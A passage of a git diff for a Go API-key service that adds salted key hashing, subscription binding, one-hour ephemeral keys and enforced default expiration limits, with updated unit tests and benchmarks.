"sk-oai-onlyKeyID_", + wantErr: true, + }, + } + + for _, tt := range tests { + t.Run(tt.name, func(t *testing.T) { + keyID, secret, err := api_keys.ParseAPIKey(tt.key) + if tt.wantErr { + if err == nil { + t.Errorf("ParseAPIKey() expected error, got keyID=%q secret=%q", keyID, secret) + } + return + } 
+ if err != nil { + t.Errorf("ParseAPIKey() unexpected error: %v", err) + return + } + if keyID != tt.wantKeyID { + t.Errorf("ParseAPIKey() keyID = %q, want %q", keyID, tt.wantKeyID) + } + if secret != tt.wantSecret { + t.Errorf("ParseAPIKey() secret = %q, want %q", secret, tt.wantSecret) + } + }) + } +} + +func TestValidateAPIKeyHash(t *testing.T) { + // Generate a key and verify the hash validation works + plaintext, hash, _, err := api_keys.GenerateAPIKey() + if err != nil { + t.Fatalf("GenerateAPIKey() returned error: %v", err) + } + + // Valid key should validate successfully + if !api_keys.ValidateAPIKeyHash(plaintext, hash) { + t.Error("ValidateAPIKeyHash() should return true for valid key") + } + + // Wrong hash should fail + if api_keys.ValidateAPIKeyHash(plaintext, "wronghash") { + t.Error("ValidateAPIKeyHash() should return false for wrong hash") + } + + // Wrong key should fail + if api_keys.ValidateAPIKeyHash("sk-oai-wrong_key", hash) { + t.Error("ValidateAPIKeyHash() should return false for wrong key") + } + + // Invalid key format should fail + if api_keys.ValidateAPIKeyHash("invalid-key", hash) { + t.Error("ValidateAPIKeyHash() should return false for invalid key format") + } } func TestIsValidKeyFormat(t *testing.T) { - t.Run("ValidKey", func(t *testing.T) { - if !api_keys.IsValidKeyFormat("sk-oai-ABC123xyz") { - t.Error("Valid key should pass") - } - }) + tests := []struct { + name string + key string + valid bool + }{ + {"valid key with separator", "sk-oai-keyID123_secretValue456", true}, + {"missing prefix", "keyID123_secretValue456", false}, + {"missing separator", "sk-oai-noSeparatorHere", false}, + {"empty key_id", "sk-oai-_onlySecret", false}, + {"empty secret", "sk-oai-onlyKeyID_", false}, + {"invalid chars in key_id", "sk-oai-key-ID_secret", false}, + {"invalid chars in secret", "sk-oai-keyID_sec-ret", false}, + {"completely invalid", "invalid-key", false}, + } - t.Run("InvalidKey", func(t *testing.T) { - if 
api_keys.IsValidKeyFormat("invalid-key") { - t.Error("Invalid key should fail") - } - }) + for _, tt := range tests { + t.Run(tt.name, func(t *testing.T) { + got := api_keys.IsValidKeyFormat(tt.key) + if got != tt.valid { + t.Errorf("IsValidKeyFormat(%q) = %v, want %v", tt.key, got, tt.valid) + } + }) + } } func BenchmarkGenerateAPIKey(b *testing.B) { @@ -116,9 +250,20 @@ func BenchmarkGenerateAPIKey(b *testing.B) { } func BenchmarkHashAPIKey(b *testing.B) { - key := "sk-oai-0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefgh" + key := "sk-oai-testKeyID123456_0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefgh" for b.Loop() { _ = api_keys.HashAPIKey(key) } } + +func BenchmarkValidateAPIKeyHash(b *testing.B) { + plaintext, hash, _, err := api_keys.GenerateAPIKey() + if err != nil { + b.Fatal(err) + } + + for b.Loop() { + _ = api_keys.ValidateAPIKeyHash(plaintext, hash) + } +} diff --git a/maas-api/internal/api_keys/service.go b/maas-api/internal/api_keys/service.go index 9d7e1c4fa..4628ad790 100644 --- a/maas-api/internal/api_keys/service.go +++ b/maas-api/internal/api_keys/service.go @@ -4,133 +4,176 @@ import ( "context" "errors" "fmt" + "strings" "time" "github.com/google/uuid" "github.com/opendatahub-io/models-as-a-service/maas-api/internal/config" + "github.com/opendatahub-io/models-as-a-service/maas-api/internal/constant" "github.com/opendatahub-io/models-as-a-service/maas-api/internal/logger" + "github.com/opendatahub-io/models-as-a-service/maas-api/internal/subscription" ) +// SubscriptionSelector resolves which MaaSSubscription to bind when minting an API key. 
+type SubscriptionSelector interface { + Select(groups []string, username string, requestedSubscription string, requestedModel string) (*subscription.SelectResponse, error) + SelectHighestPriority(groups []string, username string) (*subscription.SelectResponse, error) +} + type Service struct { - store MetadataStore - logger *logger.Logger - config *config.Config + store MetadataStore + logger *logger.Logger + config *config.Config + subSelector SubscriptionSelector } -func NewService(store MetadataStore, cfg *config.Config) *Service { - return &Service{ - store: store, - logger: logger.Production(), - config: cfg, - } +func NewService(store MetadataStore, cfg *config.Config, sub SubscriptionSelector) *Service { + return NewServiceWithLogger(store, cfg, sub, logger.Production()) } // NewServiceWithLogger creates a new service with a custom logger (for testing). -func NewServiceWithLogger(store MetadataStore, cfg *config.Config, log *logger.Logger) *Service { +func NewServiceWithLogger(store MetadataStore, cfg *config.Config, sub SubscriptionSelector, log *logger.Logger) *Service { if log == nil { log = logger.Production() } return &Service{ - store: store, - logger: log, - config: cfg, + store: store, + logger: log, + config: cfg, + subSelector: sub, } } // CreateAPIKeyResponse is returned when creating an API key. // Per Feature Refinement "Keys Shown Only Once": plaintext key is ONLY returned at creation time. 
type CreateAPIKeyResponse struct { - Key string `json:"key"` // Plaintext key - SHOWN ONCE, NEVER STORED - KeyPrefix string `json:"keyPrefix"` // Display prefix for UI - ID string `json:"id"` - Name string `json:"name"` - CreatedAt string `json:"createdAt"` - ExpiresAt *string `json:"expiresAt,omitempty"` // RFC3339 timestamp + Key string `json:"key"` // Plaintext key - SHOWN ONCE, NEVER STORED + KeyPrefix string `json:"keyPrefix"` // Display prefix for UI + ID string `json:"id"` + Name string `json:"name"` + Subscription string `json:"subscription"` // MaaSSubscription name bound to this key + CreatedAt string `json:"createdAt"` + ExpiresAt *string `json:"expiresAt,omitempty"` // RFC3339 timestamp + Ephemeral bool `json:"ephemeral"` // Short-lived programmatic key } // CreateAPIKey creates a new API key (sk-oai-* format). -// Keys can be permanent (expiresIn=nil) or expiring (expiresIn set). +// If expiresIn is not provided, defaults to APIKeyMaxExpirationDays (or 1hr for ephemeral). // Per Feature Refinement "Key Format & Security": // - Generates cryptographically secure key with sk-oai-* prefix // - Stores ONLY the SHA-256 hash (plaintext never stored) // - Returns plaintext ONCE at creation ("show-once" pattern) // - Stores user groups for subscription-based authorization. // Admins can create keys for other users by specifying a different username. 
-func (s *Service) CreateAPIKey(ctx context.Context, username string, userGroups []string, name, description string, expiresIn *time.Duration) (*CreateAPIKeyResponse, error) { - // Validate expiration based on policy - if s.config != nil && s.config.APIKeyExpirationPolicy == "required" && expiresIn == nil { - return nil, errors.New("expiration is required by system policy") - } - if expiresIn != nil && *expiresIn <= 0 { - return nil, errors.New("expiration must be positive") +func (s *Service) CreateAPIKey( + ctx context.Context, username string, userGroups []string, name, description string, + expiresIn *time.Duration, ephemeral bool, requestedSubscription string, +) (*CreateAPIKeyResponse, error) { + // Compute max expiration days once from config-or-default (CWE-613 mitigation). + maxDays := constant.DefaultAPIKeyMaxExpirationDays + if s.config != nil && s.config.APIKeyMaxExpirationDays > 0 { + maxDays = s.config.APIKeyMaxExpirationDays } + maxRegularDuration := time.Duration(maxDays) * 24 * time.Hour - // Validate against maximum expiration limit - if s.config != nil && expiresIn != nil { - maxDuration := time.Duration(s.config.APIKeyMaxExpirationDays) * 24 * time.Hour - if *expiresIn > maxDuration { - return nil, fmt.Errorf("requested expiration (%v) exceeds maximum allowed (%d days)", - *expiresIn, s.config.APIKeyMaxExpirationDays) + // Default expiration if not provided + if expiresIn == nil { + if ephemeral { + // Ephemeral keys default to 1 hour + d := 1 * time.Hour + expiresIn = &d + } else { + // Regular keys default to max expiration days + expiresIn = &maxRegularDuration } } - // Calculate absolute expiration timestamp - var expiresAt *time.Time - if expiresIn != nil { - expiry := time.Now().UTC().Add(*expiresIn) - expiresAt = &expiry + if *expiresIn <= 0 { + return nil, ErrExpirationNotPositive } - // Generate the API key + // Validate against maximum expiration limit (always enforced) + if ephemeral { + // Ephemeral keys have a strict 1-hour maximum 
to prevent abuse + maxEphemeralDuration := 1 * time.Hour + if *expiresIn > maxEphemeralDuration { + return nil, fmt.Errorf("ephemeral key expiration (%v) cannot exceed 1 hour: %w", *expiresIn, ErrExpirationExceedsMax) + } + } else if *expiresIn > maxRegularDuration { + // Regular keys always enforce max expiration (config or default) + return nil, fmt.Errorf("requested expiration (%v) exceeds maximum allowed (%d days): %w", + *expiresIn, maxDays, ErrExpirationExceedsMax) + } + + // Calculate absolute expiration timestamp (always set since we default to max) + expiresAt := time.Now().UTC().Add(*expiresIn) + + // Generate the API key with embedded key_id (used as per-key salt). + // Format: sk-oai-{key_id}_{secret} + // Hash: SHA-256(key_id + "\x00" + secret) - null delimiter prevents length-ambiguity + // Note: key_id here is the embedded salt in the API key, distinct from keyID (DB UUID) below. plaintext, hash, prefix, err := GenerateAPIKey() if err != nil { return nil, fmt.Errorf("failed to generate API key: %w", err) } + var subResp *subscription.SelectResponse + var selectErr error + if requestedSubscription != "" { + //nolint:unqueryvet,nolintlint // Select is subscription resolution, not a SQL query + subResp, selectErr = s.subSelector.Select(userGroups, username, requestedSubscription, "") + } else { + subResp, selectErr = s.subSelector.SelectHighestPriority(userGroups, username) + } + if selectErr != nil { + s.logger.Warn("Subscription selection failed when creating API key", + "user", username, + "requestedSubscription", requestedSubscription, + "error", selectErr, + ) + return nil, selectErr + } + subscriptionName := subResp.Name + // Generate unique ID for this key keyID := uuid.New().String() // Store in database (hash only, plaintext NEVER stored) // Note: prefix is NOT stored (security - reduces brute-force attack surface) // userGroups stored as PostgreSQL TEXT[] array (no JSON marshaling needed) - if err := s.store.AddKey(ctx, username, keyID, hash, 
name, description, userGroups, expiresAt); err != nil { + // Hash is SHA-256(key_id + secret) where key_id is embedded in the API key as per-key salt + if err := s.store.AddKey(ctx, username, keyID, hash, name, description, userGroups, subscriptionName, &expiresAt, ephemeral); err != nil { return nil, fmt.Errorf("failed to store API key: %w", err) } - s.logger.Info("Created API key", "user", username, "groups", userGroups, "id", keyID) + s.logger.Info("Created API key", "user", username, "groups", userGroups, "id", keyID, "ephemeral", ephemeral) // Return plaintext to user - THIS IS THE ONLY TIME IT'S AVAILABLE + formatted := expiresAt.Format(time.RFC3339) response := &CreateAPIKeyResponse{ - Key: plaintext, // SHOWN ONCE, NEVER AGAIN - KeyPrefix: prefix, - ID: keyID, - Name: name, - CreatedAt: time.Now().UTC().Format(time.RFC3339), - } - if expiresAt != nil { - formatted := expiresAt.Format(time.RFC3339) - response.ExpiresAt = &formatted + Key: plaintext, // SHOWN ONCE, NEVER AGAIN + KeyPrefix: prefix, + ID: keyID, + Name: name, + Subscription: subscriptionName, + CreatedAt: time.Now().UTC().Format(time.RFC3339), + ExpiresAt: &formatted, + Ephemeral: ephemeral, } return response, nil } -// List returns a paginated list of API keys for a user with optional filtering. -// Pagination is mandatory - no unbounded queries allowed. -// Admins can filter by username (empty = all users) and status. -func (s *Service) List(ctx context.Context, username string, params PaginationParams, statuses []string) (*PaginatedResult, error) { - return s.store.List(ctx, username, params, statuses) -} - func (s *Service) GetAPIKey(ctx context.Context, id string) (*ApiKey, error) { return s.store.Get(ctx, id) } -// ValidateAPIKey validates an API key by hash lookup (called by Authorino HTTP callback) +// ValidateAPIKey validates an API key (called by Authorino HTTP callback). 
// Per Feature Refinement "Gateway Integration (Inference Flow)": -// - Computes SHA-256 hash of incoming key -// - Looks up hash in database +// - Parses the key to extract key_id and secret +// - Computes SHA-256(key_id + secret) - key_id acts as per-key salt +// - Looks up by hash (O(1) indexed lookup) // - Returns user identity if valid, rejection reason if invalid. func (s *Service) ValidateAPIKey(ctx context.Context, key string) (*ValidationResult, error) { // Check key format @@ -141,10 +184,17 @@ func (s *Service) ValidateAPIKey(ctx context.Context, key string) (*ValidationRe }, nil } - // Compute hash of incoming key + // Compute salted hash: SHA-256(key_id + secret) + // key_id is embedded in the API key and serves as per-key salt hash := HashAPIKey(key) + if hash == "" { + return &ValidationResult{ + Valid: false, + Reason: "invalid key format", + }, nil + } - // Lookup in database + // Lookup by hash (O(1) indexed lookup) metadata, err := s.store.GetByHash(ctx, hash) if err != nil { if errors.Is(err, ErrKeyNotFound) { @@ -190,13 +240,25 @@ func (s *Service) ValidateAPIKey(ctx context.Context, key string) (*ValidationRe groups = []string{} // Return empty array if no groups stored } + // Fail closed: reject keys with no bound subscription (CWE-284) + // This prevents legacy keys, bad migrations, or manual writes with empty subscription + // from bypassing the "subscription bound at mint" access control invariant + if strings.TrimSpace(metadata.Subscription) == "" { + s.logger.Warn("API key missing bound subscription", "key_id", metadata.ID) + return &ValidationResult{ + Valid: false, + Reason: "key has no subscription bound", + }, nil + } + // Success - return user identity and groups for Authorino return &ValidationResult{ - Valid: true, - UserID: metadata.Username, - Username: metadata.Username, - KeyID: metadata.ID, - Groups: groups, // Original user groups for subscription-based authorization + Valid: true, + UserID: metadata.Username, + Username: 
metadata.Username, + KeyID: metadata.ID, + Groups: groups, // Original user groups for subscription-based authorization + Subscription: metadata.Subscription, }, nil } diff --git a/maas-api/internal/api_keys/service_test.go b/maas-api/internal/api_keys/service_test.go index 6fce7814c..97eba4e69 100644 --- a/maas-api/internal/api_keys/service_test.go +++ b/maas-api/internal/api_keys/service_test.go @@ -11,13 +11,27 @@ import ( "github.com/opendatahub-io/models-as-a-service/maas-api/internal/api_keys" "github.com/opendatahub-io/models-as-a-service/maas-api/internal/config" "github.com/opendatahub-io/models-as-a-service/maas-api/internal/logger" + "github.com/opendatahub-io/models-as-a-service/maas-api/internal/subscription" ) +type serviceTestSubSelector struct{} + +func (serviceTestSubSelector) Select(_ []string, _ string, requested string, _ string) (*subscription.SelectResponse, error) { + if requested != "" { + return &subscription.SelectResponse{Name: requested}, nil + } + return &subscription.SelectResponse{Name: "default-sub"}, nil +} + +func (serviceTestSubSelector) SelectHighestPriority(_ []string, _ string) (*subscription.SelectResponse, error) { + return &subscription.SelectResponse{Name: "default-sub"}, nil +} + func createTestService(t *testing.T) (*api_keys.Service, *api_keys.MockStore) { t.Helper() store := api_keys.NewMockStore() cfg := &config.Config{} - svc := api_keys.NewServiceWithLogger(store, cfg, logger.Development()) + svc := api_keys.NewServiceWithLogger(store, cfg, serviceTestSubSelector{}, logger.Development()) return svc, store } @@ -35,7 +49,7 @@ func TestValidateAPIKey_ValidKey(t *testing.T) { username := "alice" groups := []string{"tier-premium", "system:authenticated"} - err := store.AddKey(ctx, username, keyID, hash, "Test Key", "", groups, nil) + err := store.AddKey(ctx, username, keyID, hash, "Test Key", "", groups, "default-sub", nil, false) require.NoError(t, err) // Validate the key @@ -48,6 +62,7 @@ func 
TestValidateAPIKey_ValidKey(t *testing.T) { assert.Equal(t, username, result.Username) assert.Equal(t, keyID, result.KeyID) assert.Equal(t, groups, result.Groups) + assert.Equal(t, "default-sub", result.Subscription) } func TestValidateAPIKey_InvalidFormat(t *testing.T) { @@ -98,7 +113,7 @@ func TestValidateAPIKey_RevokedKey(t *testing.T) { username := "bob" groups := []string{"tier-free"} - err := store.AddKey(ctx, username, keyID, hash, "Revoked Key", "", groups, nil) + err := store.AddKey(ctx, username, keyID, hash, "Revoked Key", "", groups, "default-sub", nil, false) require.NoError(t, err) // Revoke the key @@ -125,7 +140,7 @@ func TestValidateAPIKey_ExpiredKey(t *testing.T) { groups := []string{"tier-basic"} expiresAt := time.Now().Add(-24 * time.Hour) // Expired 1 day ago - err := store.AddKey(ctx, username, keyID, hash, "Expired Key", "", groups, &expiresAt) + err := store.AddKey(ctx, username, keyID, hash, "Expired Key", "", groups, "default-sub", &expiresAt, false) require.NoError(t, err) // Validate the expired key @@ -146,7 +161,7 @@ func TestValidateAPIKey_EmptyGroups(t *testing.T) { plainKey, hash := createTestAPIKey(t) username := "dave" - err := store.AddKey(ctx, username, keyID, hash, "No Groups Key", "", nil, nil) + err := store.AddKey(ctx, username, keyID, hash, "No Groups Key", "", nil, "default-sub", nil, false) require.NoError(t, err) // Validate the key @@ -170,7 +185,7 @@ func TestValidateAPIKey_UpdatesLastUsed(t *testing.T) { username := "eve" groups := []string{"tier-enterprise"} - err := store.AddKey(ctx, username, keyID, hash, "Last Used Test", "", groups, nil) + err := store.AddKey(ctx, username, keyID, hash, "Last Used Test", "", groups, "default-sub", nil, false) require.NoError(t, err) // Get initial metadata (last_used_at should be empty/nil) @@ -206,7 +221,7 @@ func TestGetAPIKey(t *testing.T) { username := "alice" keyName := "Alice's Key" - err := store.AddKey(ctx, username, keyID, hash, keyName, "Test description", nil, nil) + 
err := store.AddKey(ctx, username, keyID, hash, keyName, "Test description", nil, "default-sub", nil, false) require.NoError(t, err) // Get via service layer @@ -238,7 +253,7 @@ func TestRevokeAPIKey(t *testing.T) { _, hash := createTestAPIKey(t) username := "bob" - err := store.AddKey(ctx, username, keyID, hash, "Revoke Test", "", nil, nil) + err := store.AddKey(ctx, username, keyID, hash, "Revoke Test", "", nil, "default-sub", nil, false) require.NoError(t, err) // Verify it's active @@ -256,32 +271,6 @@ func TestRevokeAPIKey(t *testing.T) { assert.Equal(t, api_keys.StatusRevoked, meta.Status) } -func TestServiceList(t *testing.T) { - ctx := context.Background() - svc, store := createTestService(t) - - // Create multiple keys for user - username := "charlie" - for i := 1; i <= 3; i++ { - keyID := "list-test-key-" + string(rune('0'+i)) - _, hash := createTestAPIKey(t) - err := store.AddKey(ctx, username, keyID, hash, "Key "+string(rune('0'+i)), "", nil, nil) - require.NoError(t, err) - } - - // List via service layer - params := api_keys.PaginationParams{ - Limit: 10, - Offset: 0, - } - result, err := svc.List(ctx, username, params, []string{api_keys.TokenStatusActive}) - require.NoError(t, err) - require.NotNil(t, result) - - assert.Len(t, result.Keys, 3, "Should return all 3 keys") - assert.False(t, result.HasMore, "Should not have more results") -} - // ============================================================ // MAX EXPIRATION VALIDATION TESTS // ============================================================ @@ -294,11 +283,11 @@ func TestCreateAPIKey_MaxExpirationLimit(t *testing.T) { cfg := &config.Config{ APIKeyMaxExpirationDays: 30, // 30 days max } - svc := api_keys.NewServiceWithLogger(store, cfg, logger.Development()) + svc := api_keys.NewServiceWithLogger(store, cfg, serviceTestSubSelector{}, logger.Development()) // Request 7 days - should succeed expiresIn := 7 * 24 * time.Hour - result, err := svc.CreateAPIKey(ctx, "alice", []string{"users"}, "Test 
Key", "", &expiresIn) + result, err := svc.CreateAPIKey(ctx, "alice", []string{"users"}, "Test Key", "", &expiresIn, false, "") require.NoError(t, err) require.NotNil(t, result) @@ -310,11 +299,11 @@ func TestCreateAPIKey_MaxExpirationLimit(t *testing.T) { cfg := &config.Config{ APIKeyMaxExpirationDays: 30, // 30 days max } - svc := api_keys.NewServiceWithLogger(store, cfg, logger.Development()) + svc := api_keys.NewServiceWithLogger(store, cfg, serviceTestSubSelector{}, logger.Development()) // Request 60 days - should fail expiresIn := 60 * 24 * time.Hour - result, err := svc.CreateAPIKey(ctx, "alice", []string{"users"}, "Test Key", "", &expiresIn) + result, err := svc.CreateAPIKey(ctx, "alice", []string{"users"}, "Test Key", "", &expiresIn, false, "") require.Error(t, err) assert.Nil(t, result) @@ -327,11 +316,11 @@ func TestCreateAPIKey_MaxExpirationLimit(t *testing.T) { cfg := &config.Config{ APIKeyMaxExpirationDays: 30, // 30 days max } - svc := api_keys.NewServiceWithLogger(store, cfg, logger.Development()) + svc := api_keys.NewServiceWithLogger(store, cfg, serviceTestSubSelector{}, logger.Development()) // Request exactly 30 days - should succeed expiresIn := 30 * 24 * time.Hour - result, err := svc.CreateAPIKey(ctx, "alice", []string{"users"}, "Test Key", "", &expiresIn) + result, err := svc.CreateAPIKey(ctx, "alice", []string{"users"}, "Test Key", "", &expiresIn, false, "") require.NoError(t, err) require.NotNil(t, result) @@ -342,13 +331,263 @@ func TestCreateAPIKey_MaxExpirationLimit(t *testing.T) { cfg := &config.Config{ APIKeyMaxExpirationDays: 30, // 30 days max } - svc := api_keys.NewServiceWithLogger(store, cfg, logger.Development()) + svc := api_keys.NewServiceWithLogger(store, cfg, serviceTestSubSelector{}, logger.Development()) + + // No expiration requested - should default to APIKeyMaxExpirationDays (30 days) + result, err := svc.CreateAPIKey(ctx, "alice", []string{"users"}, "Test Key", "", nil, false, "") + + require.NoError(t, err) + 
require.NotNil(t, result) + require.NotNil(t, result.ExpiresAt, "should default to max expiration when not provided") + }) + + // Regression test for CWE-613: ensure default max is enforced when config is nil/zero + t.Run("DefaultConfigEnforcesMaxExpiration", func(t *testing.T) { + store := api_keys.NewMockStore() + // nil config or zero APIKeyMaxExpirationDays should fall back to DefaultAPIKeyMaxExpirationDays (90 days) + svc := api_keys.NewServiceWithLogger(store, nil, serviceTestSubSelector{}, logger.Development()) + + // Request 365 days - should fail because default max is 90 days + expiresIn := 365 * 24 * time.Hour + result, err := svc.CreateAPIKey(ctx, "alice", []string{"users"}, "Test Key", "", &expiresIn, false, "") + + require.Error(t, err, "should reject expiration exceeding default max (90 days)") + assert.Nil(t, result) + require.ErrorIs(t, err, api_keys.ErrExpirationExceedsMax) + assert.Contains(t, err.Error(), "90 days") + }) + + t.Run("ZeroConfigEnforcesDefaultMax", func(t *testing.T) { + store := api_keys.NewMockStore() + // Config with APIKeyMaxExpirationDays=0 should fall back to default + cfg := &config.Config{ + APIKeyMaxExpirationDays: 0, + } + svc := api_keys.NewServiceWithLogger(store, cfg, serviceTestSubSelector{}, logger.Development()) + + // Request 365 days - should fail because default max is 90 days + expiresIn := 365 * 24 * time.Hour + result, err := svc.CreateAPIKey(ctx, "alice", []string{"users"}, "Test Key", "", &expiresIn, false, "") + + require.Error(t, err, "should reject expiration exceeding default max (90 days)") + assert.Nil(t, result) + require.ErrorIs(t, err, api_keys.ErrExpirationExceedsMax) + }) +} + +// ============================================================ +// EPHEMERAL KEY EXPIRATION TESTS +// ============================================================ + +// assertExpirationWithinTolerance verifies that expiresAt is within tolerance of expectedDuration from now. 
+func assertExpirationWithinTolerance(t *testing.T, expiresAtStr string, expectedDuration time.Duration, now time.Time) { + t.Helper() + expiresAt, err := time.Parse(time.RFC3339, expiresAtStr) + require.NoError(t, err) + + expectedExpiry := now.Add(expectedDuration) + diff := expiresAt.Sub(expectedExpiry).Abs() + assert.LessOrEqual(t, diff, 5*time.Second, + "expiration should be ~%v from now, got diff: %v", expectedDuration, diff) +} + +func TestEphemeralKeyExpiration(t *testing.T) { + ctx := context.Background() - // Request permanent key (nil expiration) - should succeed (max limit only applies to expiring keys) - result, err := svc.CreateAPIKey(ctx, "alice", []string{"users"}, "Test Key", "", nil) + t.Run("DefaultExpirationIsOneHour", func(t *testing.T) { + svc := api_keys.NewServiceWithLogger(api_keys.NewMockStore(), &config.Config{}, serviceTestSubSelector{}, logger.Development()) + now := time.Now().UTC() + + result, err := svc.CreateAPIKey(ctx, "user", []string{"users"}, "ephemeral-test", "", nil, true, "") + + require.NoError(t, err) + require.NotNil(t, result) + assert.True(t, result.Ephemeral) + require.NotNil(t, result.ExpiresAt) + assertExpirationWithinTolerance(t, *result.ExpiresAt, 1*time.Hour, now) + }) + + t.Run("CustomExpirationWithinLimit", func(t *testing.T) { + svc := api_keys.NewServiceWithLogger(api_keys.NewMockStore(), &config.Config{}, serviceTestSubSelector{}, logger.Development()) + expiresIn := 30 * time.Minute + now := time.Now().UTC() + + result, err := svc.CreateAPIKey(ctx, "user", []string{"users"}, "short-lived", "", &expiresIn, true, "") + + require.NoError(t, err) + require.NotNil(t, result) + require.NotNil(t, result.ExpiresAt) + assertExpirationWithinTolerance(t, *result.ExpiresAt, 30*time.Minute, now) + }) + + t.Run("ExactlyOneHour", func(t *testing.T) { + svc := api_keys.NewServiceWithLogger(api_keys.NewMockStore(), &config.Config{}, serviceTestSubSelector{}, logger.Development()) + expiresIn := 1 * time.Hour + + result, err 
:= svc.CreateAPIKey(ctx, "user", []string{"users"}, "exactly-one-hour", "", &expiresIn, true, "") require.NoError(t, err) require.NotNil(t, result) + assert.True(t, result.Ephemeral) + }) + + // Table-driven tests for invalid expiration cases + invalidExpirationTests := []struct { + name string + expiresIn time.Duration + expectedErr error + errContains string + }{ + { + name: "ExceedsOneHourLimit", + expiresIn: 2 * time.Hour, + expectedErr: api_keys.ErrExpirationExceedsMax, + errContains: "cannot exceed 1 hour", + }, + { + name: "ZeroExpiration", + expiresIn: 0, + expectedErr: api_keys.ErrExpirationNotPositive, + errContains: "must be positive", + }, + { + name: "NegativeExpiration", + expiresIn: -1 * time.Hour, + expectedErr: api_keys.ErrExpirationNotPositive, + errContains: "must be positive", + }, + } + + for _, tt := range invalidExpirationTests { + t.Run(tt.name, func(t *testing.T) { + svc := api_keys.NewServiceWithLogger(api_keys.NewMockStore(), &config.Config{}, serviceTestSubSelector{}, logger.Development()) + expiresIn := tt.expiresIn + + result, err := svc.CreateAPIKey(ctx, "user", []string{"users"}, "test-key", "", &expiresIn, true, "") + + require.Error(t, err) + assert.Nil(t, result) + require.ErrorIs(t, err, tt.expectedErr) + assert.Contains(t, err.Error(), tt.errContains) + }) + } +} + +// subSelectorStub implements api_keys.SubscriptionSelector for CreateAPIKey subscription tests. +type subSelectorStub struct { + selectErr error + highestPriorityErr error + // highestName is returned by SelectHighestPriority on success; empty defaults to "from-priority". 
+ highestName string +} + +func (s subSelectorStub) Select(_ []string, _ string, requested string, _ string) (*subscription.SelectResponse, error) { + if s.selectErr != nil { + return nil, s.selectErr + } + return &subscription.SelectResponse{Name: requested}, nil +} + +func (s subSelectorStub) SelectHighestPriority(_ []string, _ string) (*subscription.SelectResponse, error) { + if s.highestPriorityErr != nil { + return nil, s.highestPriorityErr + } + name := s.highestName + if name == "" { + name = "from-priority" + } + return &subscription.SelectResponse{Name: name}, nil +} + +func TestCreateAPIKey_Subscription(t *testing.T) { + ctx := context.Background() + cfg := &config.Config{} + user := "u" + groups := []string{"g"} + + t.Run("stores_explicit_subscription_name", func(t *testing.T) { + store := api_keys.NewMockStore() + svc := api_keys.NewServiceWithLogger(store, cfg, subSelectorStub{}, logger.Development()) + + result, err := svc.CreateAPIKey(ctx, user, groups, "key", "", nil, false, "team-a") + require.NoError(t, err) + require.Equal(t, "team-a", result.Subscription) + + meta, err := store.Get(ctx, result.ID) + require.NoError(t, err) + require.Equal(t, "team-a", meta.Subscription) + }) + + t.Run("defaults_to_highest_priority_when_omitted", func(t *testing.T) { + store := api_keys.NewMockStore() + svc := api_keys.NewServiceWithLogger(store, cfg, subSelectorStub{}, logger.Development()) + + result, err := svc.CreateAPIKey(ctx, user, groups, "key", "", nil, false, "") + require.NoError(t, err) + require.Equal(t, "from-priority", result.Subscription) + }) + + t.Run("selector_errors_do_not_persist_key", func(t *testing.T) { + errTests := []struct { + name string + stub subSelectorStub + requested string + assertErr func(*testing.T, error) + }{ + { + name: "subscription_not_found", + stub: subSelectorStub{ + selectErr: &subscription.SubscriptionNotFoundError{Subscription: "missing-sub"}, + }, + requested: "missing-sub", + assertErr: func(t *testing.T, err error) 
{ + t.Helper() + var target *subscription.SubscriptionNotFoundError + require.ErrorAs(t, err, &target) + }, + }, + { + name: "subscription_access_denied", + stub: subSelectorStub{ + selectErr: &subscription.AccessDeniedError{Subscription: "denied-sub"}, + }, + requested: "denied-sub", + assertErr: func(t *testing.T, err error) { + t.Helper() + var target *subscription.AccessDeniedError + require.ErrorAs(t, err, &target) + }, + }, + { + name: "no_accessible_subscription", + stub: subSelectorStub{ + highestPriorityErr: &subscription.NoSubscriptionError{}, + }, + requested: "", + assertErr: func(t *testing.T, err error) { + t.Helper() + var target *subscription.NoSubscriptionError + require.ErrorAs(t, err, &target) + }, + }, + } + + for _, tt := range errTests { + t.Run(tt.name, func(t *testing.T) { + store := api_keys.NewMockStore() + svc := api_keys.NewServiceWithLogger(store, cfg, tt.stub, logger.Development()) + + result, err := svc.CreateAPIKey(ctx, user, groups, "key", "", nil, false, tt.requested) + require.Error(t, err) + require.Nil(t, result) + tt.assertErr(t, err) + + res, sErr := store.Search(ctx, user, &api_keys.SearchFilters{}, &api_keys.SortParams{By: api_keys.DefaultSortBy, Order: api_keys.DefaultSortOrder}, + &api_keys.PaginationParams{Limit: 10, Offset: 0}) + require.NoError(t, sErr) + assert.Empty(t, res.Keys) + }) + } }) } diff --git a/maas-api/internal/api_keys/store_interface.go b/maas-api/internal/api_keys/store_interface.go index 0c55839d2..49b9928a1 100644 --- a/maas-api/internal/api_keys/store_interface.go +++ b/maas-api/internal/api_keys/store_interface.go @@ -12,6 +12,10 @@ var ( ErrInvalidKey = errors.New("api key is invalid or revoked") ErrEmptyJTI = errors.New("key ID is required and cannot be empty") ErrEmptyName = errors.New("key name is required and cannot be empty") + + // Expiration validation errors. 
+ ErrExpirationNotPositive = errors.New("expiration must be positive") + ErrExpirationExceedsMax = errors.New("expiration exceeds maximum allowed") ) // Legacy constants for backward compatibility with database operations. @@ -25,18 +29,19 @@ const ( type MetadataStore interface { // AddKey stores an API key with hash-only storage (no plaintext). // Keys can be permanent (expiresAt=nil) or expiring (expiresAt set). - // userGroups is an array of user's groups (used for authorization). + // + // Parameters: + // - keyID: Database UUID/JTI (primary key), distinct from the embedded salt in the API key + // - keyHash: SHA-256(embedded_key_id + "\x00" + secret), where embedded_key_id is the + // per-key salt encoded in the API key format (sk-oai-{embedded_key_id}_{secret}) + // - userGroups: array of user's groups (used for authorization) + // - ephemeral: marks the key as short-lived for programmatic use + // // Note: keyPrefix is NOT stored (security - reduces brute-force attack surface). - AddKey(ctx context.Context, username string, keyID, keyHash, name, description string, userGroups []string, expiresAt *time.Time) error - - // List returns a paginated list of API keys with optional filtering. - // Pagination is mandatory - no unbounded queries allowed. - // username can be empty (admin viewing all users) or specific username. - // statuses can filter by status (active, revoked, expired) - empty means all statuses. - List(ctx context.Context, username string, params PaginationParams, statuses []string) (*PaginatedResult, error) + AddKey(ctx context.Context, username string, keyID, keyHash, name, description string, userGroups []string, subscription string, expiresAt *time.Time, ephemeral bool) error - // Search returns API keys matching the search criteria - // Supports filtering, sorting, and pagination + // Search returns API keys matching the search criteria. + // Supports filtering, sorting, and pagination. 
